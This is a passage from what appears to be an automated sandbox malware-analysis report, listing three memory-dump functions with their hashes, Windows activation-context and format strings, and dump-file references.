                • Instruction Fuzzy Hash: CC900235605811129540715848945564015A7F0301B55C012E0424565CCB248A565362
                Function 0149A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                Download Yara Rule
                Strings
                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 014E7AE6
                • RtlpFindActivationContextSection_CheckParameters, xrefs: 014E79D0, 014E79F5
                • SsHd, xrefs: 0149A3E4
                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014E79D5
                • Actx , xrefs: 014E7A0C, 014E7A73
                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014E79FA
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                • API String ID: 0-1988757188
                • Opcode ID: d8f2f68ff71df4ca4d82131b40f9b501ba73f601967035ef0e51bd7bdff3d09e
                • Instruction ID: c38ec2509712e78b65dbeaba078e6982fc2081c288f9d5fe517e6490b407373c
                • Opcode Fuzzy Hash: d8f2f68ff71df4ca4d82131b40f9b501ba73f601967035ef0e51bd7bdff3d09e
                • Instruction Fuzzy Hash: 56E1A4716043028FEB25CE68C488B6B7FE1BB84365F244A2FE995CB3A1D731D945CB91
                Function 015320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$[$]:%u
                • API String ID: 48624451-2819853543
                • Opcode ID: cfd3af5902d8790e63142bf64e0d8adace9a20db8dc30c30e89e45c180c39d65
                • Instruction ID: d83a220b08ad36b3e1115d5a85d46a29efa0dba09f55de0e3a83abe1233fa2e2
                • Opcode Fuzzy Hash: cfd3af5902d8790e63142bf64e0d8adace9a20db8dc30c30e89e45c180c39d65
                • Instruction Fuzzy Hash: 0121657AA00519ABDB21DF79DD54AEEBBF8FF94640F04011AE905D7200E730D9018BE1
                Function 01532300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$]:%u
                • API String ID: 48624451-3050659472
                • Opcode ID: def02a83b561a11e69862516c7b997978e87a7291d8a97910725bdd34c6e7980
                • Instruction ID: aed4db35a1c8eca38f46a21936270e4f366272bdd770b464a2c3303f8267f6e6
                • Opcode Fuzzy Hash: def02a83b561a11e69862516c7b997978e87a7291d8a97910725bdd34c6e7980
                • Instruction Fuzzy Hash: BC319572A006199FDB20DF2DDC50BEEB7F8FF54610F95455AE949E7200EB30EA448BA0